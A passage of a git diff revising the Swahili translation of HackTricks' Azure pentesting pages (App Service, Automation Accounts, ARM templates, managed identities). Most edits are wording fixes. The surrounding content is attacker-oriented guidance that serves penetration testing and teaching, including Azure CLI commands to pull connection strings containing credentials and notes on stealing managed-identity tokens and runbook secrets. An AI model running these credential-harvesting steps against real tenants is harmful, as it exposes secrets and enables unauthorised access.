 /subscriptions/9291ff6e-6afb-430e-82a4-6f04b2d05c7f/resourceGroups/Resource_Group_1/providers/Microsoft.ManagedIdentity/userAssignedIdentities/TestManagedIdentity2
 ```
-Then the attacker needs to have **compromised somehow the VM** to steal tokens from the assigned managed identities. Check **more info in**:
+Kisha mshambuliaji anahitaji kuwa **amevunjika somehow VM** ili kuiba tokens kutoka kwa utambulisho wa usimamizi uliotolewa. Angalia **maelezo zaidi katika**:
 
 {{#ref}}
 https://book.hacktricks.xyz/pentesting-web/ssrf-server-side-request-forgery/cloud-ssrf#azure-vm
@@ -351,6 +351,6 @@ https://book.hacktricks.xyz/pentesting-web/ssrf-server-side-request-forgery/clou
 
 ### TODO: Microsoft.Compute/virtualMachines/WACloginAsAdmin/action
 
-Kulingana na [**docs**](https://learn.microsoft.com/en-us/azure/role-based-access-control/permissions/compute#microsoftcompute), ruhusa hii inakuwezesha kudhibiti OS ya rasilimali yako kupitia Windows Admin Center kama msimamizi. Hivyo inaonekana hii inatoa ufikiaji kwa WAC kudhibiti VMs...
+Kulingana na [**docs**](https://learn.microsoft.com/en-us/azure/role-based-access-control/permissions/compute#microsoftcompute), ruhusa hii inakuwezesha kusimamia OS ya rasilimali yako kupitia Windows Admin Center kama msimamizi. Hivyo inaonekana hii inatoa ufikiaji kwa WAC kudhibiti VMs...
 
 {{#include ../../../banners/hacktricks-training.md}}
diff --git a/src/pentesting-cloud/azure-security/az-services/README.md b/src/pentesting-cloud/azure-security/az-services/README.md
index 43708dc3b..3c66342e1 100644
--- a/src/pentesting-cloud/azure-security/az-services/README.md
+++ b/src/pentesting-cloud/azure-security/az-services/README.md
@@ -62,6 +62,6 @@ return func.HttpResponse(val, status_code=200)
 ```
 ## Orodha ya Huduma
 
-**Kurasa za sehemu hii zimepangwa kulingana na huduma za Azure. Huko utaweza kupata taarifa kuhusu huduma (jinsi inavyofanya kazi na uwezo) na pia jinsi ya kuhesabu kila huduma.**
+**Kurasa za sehemu hii zimepangwa kwa huduma za Azure. Ndani yake utaweza kupata taarifa kuhusu huduma hiyo (jinsi inavyofanya kazi na uwezo) na pia jinsi ya kuhesabu kila huduma.**
 
 {{#include ../../../banners/hacktricks-training.md}}
diff --git a/src/pentesting-cloud/azure-security/az-services/az-acr.md b/src/pentesting-cloud/azure-security/az-services/az-acr.md
index 429e7a80e..6b169b116 100644
--- a/src/pentesting-cloud/azure-security/az-services/az-acr.md
+++ b/src/pentesting-cloud/azure-security/az-services/az-acr.md
@@ -4,7 +4,7 @@
 
 ## Basic Information
 
-Azure Container Registry (ACR) ni huduma inayosimamiwa inayotolewa na Microsoft Azure kwa **hifadhi na usimamizi wa picha za kontena za Docker na vitu vingine**. Inatoa vipengele kama vile zana za maendeleo zilizojumuishwa, geo-replication, hatua za usalama kama udhibiti wa ufikiaji kulingana na majukumu na uchambuzi wa picha, ujenzi wa kiotomatiki, webhooks na triggers, na kutengwa kwa mtandao. Inafanya kazi na zana maarufu kama Docker CLI na Kubernetes, na inajumuika vizuri na huduma nyingine za Azure.
+Azure Container Registry (ACR) ni huduma inayosimamiwa inayotolewa na Microsoft Azure kwa **hifadhi na usimamizi wa picha za kontena za Docker na vitu vingine**. Inatoa vipengele kama vile zana za maendeleo zilizounganishwa, geo-replication, hatua za usalama kama udhibiti wa ufikiaji kulingana na majukumu na uchambuzi wa picha, ujenzi wa otomatiki, webhooks na triggers, na kutengwa kwa mtandao. Inafanya kazi na zana maarufu kama Docker CLI na Kubernetes, na inajumuika vizuri na huduma nyingine za Azure.
 
 ### Enumerate
 
diff --git a/src/pentesting-cloud/azure-security/az-services/az-app-service.md b/src/pentesting-cloud/azure-security/az-services/az-app-service.md
index e0b00ec8b..e72e0ab36 100644
--- a/src/pentesting-cloud/azure-security/az-services/az-app-service.md
+++ b/src/pentesting-cloud/azure-security/az-services/az-app-service.md
@@ -4,34 +4,34 @@
 
 ## App Service Basic Information
 
-Azure App Services inaruhusu waendelezaji **kuunda, kupeleka, na kupanua programu za wavuti, nyuma za programu za simu, na APIs bila shida**. Inasaidia lugha nyingi za programu na inajumuisha zana na huduma mbalimbali za Azure kwa ajili ya kuboresha utendaji na usimamizi.
+Azure App Services inaruhusu waendelezaji **kuunda, kupeleka, na kupanua programu za wavuti, nyuma za programu za simu, na APIs bila shida**. Inasaidia lugha nyingi za programu na inajumuisha zana na huduma mbalimbali za Azure kwa ajili ya kuboresha kazi na usimamizi.
 
 Kila programu inafanya kazi ndani ya sandbox lakini kutengwa kunategemea mipango ya App Service
 
-- Programu katika ngazi za Bure na Kushiriki zinafanya kazi kwenye VMs zinazoshirikiwa
-- Programu katika ngazi za Kawaida na Kitaalamu zinafanya kazi kwenye VMs zilizotengwa
+- Programu katika ngazi za Free na Shared zinafanya kazi kwenye VMs za pamoja
+- Programu katika ngazi za Standard na Premium zinafanya kazi kwenye VMs maalum
 
 > [!WARNING]
-> Kumbuka kwamba **hakuna** ya kutengwa hizo **zinazuia** udhaifu mwingine wa kawaida wa **wavuti** (kama vile upakuaji wa faili, au sindano). Na ikiwa **utambulisho wa usimamizi** unatumika, inaweza kuwa na uwezo wa **kuinua mamlaka kwao**.
+> Kumbuka kwamba **hakuna** ya kutengwa hizo **zinazuia** udhaifu mwingine wa kawaida wa **wavuti** (kama vile kupakia faili, au sindano). Na ikiwa **utambulisho wa usimamizi** unatumika, inaweza kuwa na uwezo wa **kuinua mamlaka kwao**.
 
 ### Azure Function Apps
 
-Kimsingi **Azure Function apps ni sehemu ya Azure App Service** katika wavuti na ikiwa utaenda kwenye console ya wavuti na orodheshe huduma zote za programu au tekeleza `az webapp list` katika az cli utaweza **kuona programu za Function pia zikiwa orodheshwa hapa**.
+Kimsingi **Azure Function apps ni sehemu ya Azure App Service** katika wavuti na ikiwa utaenda kwenye console ya wavuti na orodheshe huduma zote za programu au tekeleza `az webapp list` katika az cli utaweza **kuona Function apps pia zikiwa orodheshwa hapa**.
 
-Kwa kweli baadhi ya **vipengele vinavyohusiana na usalama** ambavyo huduma za programu zinatumia (`webapp` katika az cli), **pia vinatumika na programu za Function**.
+Kwa kweli baadhi ya **vipengele vinavyohusiana na usalama** ambavyo huduma za programu zinatumia (`webapp` katika az cli), **pia vinatumika na Function apps**.
 
 ## Basic Authentication
 
-Unapounda programu ya wavuti (na kazi ya Azure kwa kawaida) inawezekana kuashiria ikiwa unataka Uthibitishaji wa Msingi uwekwe. Hii kimsingi **inawezesha SCM na FTP** kwa ajili ya programu ili iwezekane kupeleka programu hiyo kwa kutumia teknolojia hizo.\
+Unapounda programu ya wavuti (na kazi ya Azure kwa kawaida) inawezekana kuashiria ikiwa unataka Uthibitishaji wa Msingi uwekwe. Hii kimsingi **inawezesha SCM na FTP** kwa programu ili iwezekane kupeleka programu kwa kutumia teknolojia hizo.\
 Zaidi ya hayo ili kuungana nazo, Azure inatoa **API inayoruhusu kupata jina la mtumiaji, nenosiri na URL** ya kuungana na seva za SCM na FTP.
 
 - Uthibitishaji: az webapp auth show --name lol --resource-group lol_group
 
 SSH
 
-Daima On
+Always On
 
-Kukarabati
+Debugging
 
 ### Enumeration
 
@@ -87,9 +87,6 @@ az webapp config storage-account list --name  --resource-gl_group
 
 
 
-
-
-
 # List all the functions
 az functionapp list
 
@@ -177,7 +174,7 @@ done
 {{#endtab }}
 {{#endtabs }}
 
-#### Pata akreditif na upate ufikiaji wa msimbo wa wavuti
+#### Pata akreditif na kupata ufikiaji wa msimbo wa wavuti
 ```bash
 # Get connection strings that could contain credentials (with DBs for example)
 az webapp config connection-string list --name  --resource-group 
diff --git a/src/pentesting-cloud/azure-security/az-services/az-application-proxy.md b/src/pentesting-cloud/azure-security/az-services/az-application-proxy.md
index e8c9785a8..fef15272b 100644
--- a/src/pentesting-cloud/azure-security/az-services/az-application-proxy.md
+++ b/src/pentesting-cloud/azure-security/az-services/az-application-proxy.md
@@ -15,7 +15,7 @@ Inafanya kazi kama ifuatavyo:
 1. Baada ya mtumiaji kufikia programu kupitia kiunganishi, mtumiaji anapelekwa kwenye **ukurasa wa kuingia wa Azure AD**.
 2. Baada ya **kuingia kwa mafanikio**, Azure AD inatuma **token** kwa kifaa cha mteja wa mtumiaji.
 3. Mteja anatumia token kwa **huduma ya Application Proxy**, ambayo inapata jina la msingi la mtumiaji (UPN) na jina la msingi la usalama (SPN) kutoka kwa token. **Application Proxy kisha inatuma ombi kwa kiunganishi cha Application Proxy**.
-4. Ikiwa umeweka muunganisho wa kuingia mara moja, kiunganishi kinafanya **uthibitishaji wa ziada** wowote unaohitajika kwa niaba ya mtumiaji.
+4. Ikiwa umeweka muunganisho wa mara moja, kiunganishi kinafanya **uthibitishaji wa ziada** wowote unaohitajika kwa niaba ya mtumiaji.
 5. Kiunganishi kinatuma ombi kwa **programu ya ndani**.
 6. **Jibu** linatumwa kupitia kiunganishi na huduma ya Application Proxy **kwa mtumiaji**.
 
@@ -31,7 +31,7 @@ Get-AzureADServicePrincipal -All $true | ?{$_.DisplayName -eq "Name"}
 # to find users and groups assigned to the application. Pass the ObjectID of the Service Principal to it
 Get-ApplicationProxyAssignedUsersAndGroups -ObjectId 
 ```
-## Marejeleo
+## Marejeo
 
 - [https://learn.microsoft.com/en-us/azure/active-directory/app-proxy/application-proxy](https://learn.microsoft.com/en-us/azure/active-directory/app-proxy/application-proxy)
 
diff --git a/src/pentesting-cloud/azure-security/az-services/az-arm-templates.md b/src/pentesting-cloud/azure-security/az-services/az-arm-templates.md
index 0d12041c5..240038ca7 100644
--- a/src/pentesting-cloud/azure-security/az-services/az-arm-templates.md
+++ b/src/pentesting-cloud/azure-security/az-services/az-arm-templates.md
@@ -4,11 +4,11 @@
 
 ## Basic Information
 
-[From the docs:](https://learn.microsoft.com/en-us/azure/azure-resource-manager/templates/overview) Ili kutekeleza **miundombinu kama msimbo kwa ajili ya suluhisho zako za Azure**, tumia Azure Resource Manager templates (ARM templates). Template ni faili ya JavaScript Object Notation (**JSON**) ambayo **inafafanua** **miundombinu** na usanidi wa mradi wako. Template inatumia sintaksia ya kutangaza, ambayo inakuwezesha kusema unachokusudia kupeleka bila kuandika mfululizo wa amri za programu ili kuunda hiyo. Katika template, unataja rasilimali za kupeleka na mali za rasilimali hizo.
+[From the docs:](https://learn.microsoft.com/en-us/azure/azure-resource-manager/templates/overview) Ili kutekeleza **miundombinu kama msimbo kwa suluhisho zako za Azure**, tumia Azure Resource Manager templates (ARM templates). Template ni faili ya JavaScript Object Notation (**JSON**) ambayo **inafafanua** **miundombinu** na usanidi wa mradi wako. Template inatumia sintaksia ya kutangaza, ambayo inakuwezesha kusema kile unachokusudia kupeleka bila kuandika mfululizo wa amri za programu kuunda hiyo. Katika template, unataja rasilimali za kupeleka na mali za rasilimali hizo.
 
 ### History
 
-Ikiwa unaweza kuipata, unaweza kuwa na **habari kuhusu rasilimali** ambazo hazipo lakini zinaweza kupelekwa katika siku zijazo. Zaidi ya hayo, ikiwa **parameta** inayoshikilia **habari nyeti** iligongwa kama "**String**" **badala** ya "**SecureString**", itakuwa ipo katika **maandishi wazi**.
+Ikiwa unaweza kuipata, unaweza kuwa na **habari kuhusu rasilimali** ambazo hazipo lakini zinaweza kupelekwa katika siku zijazo. Zaidi ya hayo, ikiwa **parameta** inayoshikilia **habari nyeti** iligongwa kama "**String**" **badala** ya "**SecureString**", itakuwa katika **maandishi wazi**.
 
 ## Search Sensitive Info
 
diff --git a/src/pentesting-cloud/azure-security/az-services/az-automation-account/README.md b/src/pentesting-cloud/azure-security/az-services/az-automation-account/README.md
index 9b700b2db..e13f81276 100644
--- a/src/pentesting-cloud/azure-security/az-services/az-automation-account/README.md
+++ b/src/pentesting-cloud/azure-security/az-services/az-automation-account/README.md
@@ -4,45 +4,45 @@
 
 ## Basic Information
 
-[From the docs:](https://learn.microsoft.com/en-us/azure/automation/overview) Azure Automation inatoa huduma ya automation ya msingi ya wingu, masasisho ya mfumo wa uendeshaji, na huduma ya usanidi inayounga mkono usimamizi thabiti katika mazingira yako ya Azure na yasiyo ya Azure. Inajumuisha automation ya mchakato, usimamizi wa usanidi, usimamizi wa masasisho, uwezo wa pamoja, na vipengele tofauti.
+[From the docs:](https://learn.microsoft.com/en-us/azure/automation/overview) Azure Automation inatoa huduma ya automation ya msingi ya wingu, masasisho ya mfumo wa uendeshaji, na huduma ya usimamizi wa usanidi inayounga mkono usimamizi thabiti katika mazingira yako ya Azure na yasiyo ya Azure. Inajumuisha automation ya mchakato, usimamizi wa usanidi, usimamizi wa masasisho, uwezo wa pamoja, na vipengele tofauti.
 
-Hizi ni kama "**kazi zilizopangwa**" katika Azure ambazo zitakuruhusu kutekeleza mambo (vitendo au hata scripts) ili **kusimamia**, kuangalia na kuunda **mazingira ya Azure**.
+Hizi ni kama "**scheduled tasks**" katika Azure ambazo zitakuruhusu kutekeleza mambo (vitendo au hata scripts) ili **kusimamia**, kuangalia na kuunda **mazingira ya Azure**.
 
 ### Run As Account
 
-Wakati **Run as Account** inatumika, inaunda **maombi** ya Azure AD yenye cheti kilichojisaini, inaunda **mwakilishi wa huduma** na inatoa jukumu la **Mchango** kwa akaunti katika **usajili wa sasa** (haki nyingi).\
-Microsoft inapendekeza kutumia **Utambulisho wa Kusimamiwa** kwa Akaunti ya Automation.
+Wakati **Run as Account** inatumika, inaunda **application** ya Azure AD yenye cheti kilichojisaini yenyewe, inaunda **service principal** na inatoa jukumu la **Contributor** kwa akaunti katika **subscription** ya sasa (privileges nyingi).\
+Microsoft inapendekeza kutumia **Managed Identity** kwa Akaunti ya Automation.
 
 > [!WARNING]
-> Hii itakuwa **ondolewa tarehe 30 Septemba 2023 na kubadilishwa kwa Utambulisho wa Kusimamiwa.**
+> Hii itakuwa **ondolewa tarehe Septemba 30, 2023 na kubadilishwa kwa Managed Identities.**
 
 ## Runbooks & Jobs
 
-**Runbooks** zinakuruhusu **kutekeleza msimbo wa PowerShell** wa kawaida. Hii inaweza **kutumiwa vibaya na mshambuliaji** kuiba ruhusa za **mwakilishi ulioambatanishwa** (ikiwa upo).\
-Katika **msimbo** wa **Runbooks** unaweza pia kupata **habari nyeti** (kama vile creds).
+**Runbooks** zinakuruhusu **kutekeleza PowerShell** ya kawaida. Hii inaweza **kutumiwa vibaya na mshambuliaji** kuiba ruhusa za **principal** iliyoambatanishwa (ikiwa ipo).\
+Katika **code** ya **Runbooks** unaweza pia kupata **sensitive info** (kama vile creds).
 
-Ikiwa unaweza **kusoma** **kazi**, fanya hivyo kwani **zina** **matokeo** ya kukimbia (habari **nyeti** zinazoweza kuwa).
+Ikiwa unaweza **kusoma** **jobs**, fanya hivyo kwani **zinashikilia** **output** ya run (potenshiali **sensitive info**).
 
 Nenda kwa `Automation Accounts` --> `